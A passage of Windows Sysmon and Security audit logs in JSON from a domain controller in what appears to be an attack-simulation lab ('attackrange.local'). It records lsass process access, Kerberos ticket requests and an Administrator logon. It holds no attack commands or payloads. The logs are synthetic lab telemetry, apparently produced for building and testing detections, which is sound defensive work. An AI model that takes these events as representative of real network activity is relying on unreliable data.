C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.891","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220662,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220663,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220664,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220665,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAC135\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xac135","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{F0F909A7-1C6D-5D35-3A3A-4067C583B2E2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220666,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAC135\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xac135","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5660,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.891\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.891","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5661,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.891\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.891","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220667,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAC135\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xac135","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5662,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.906\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.906","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220668,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
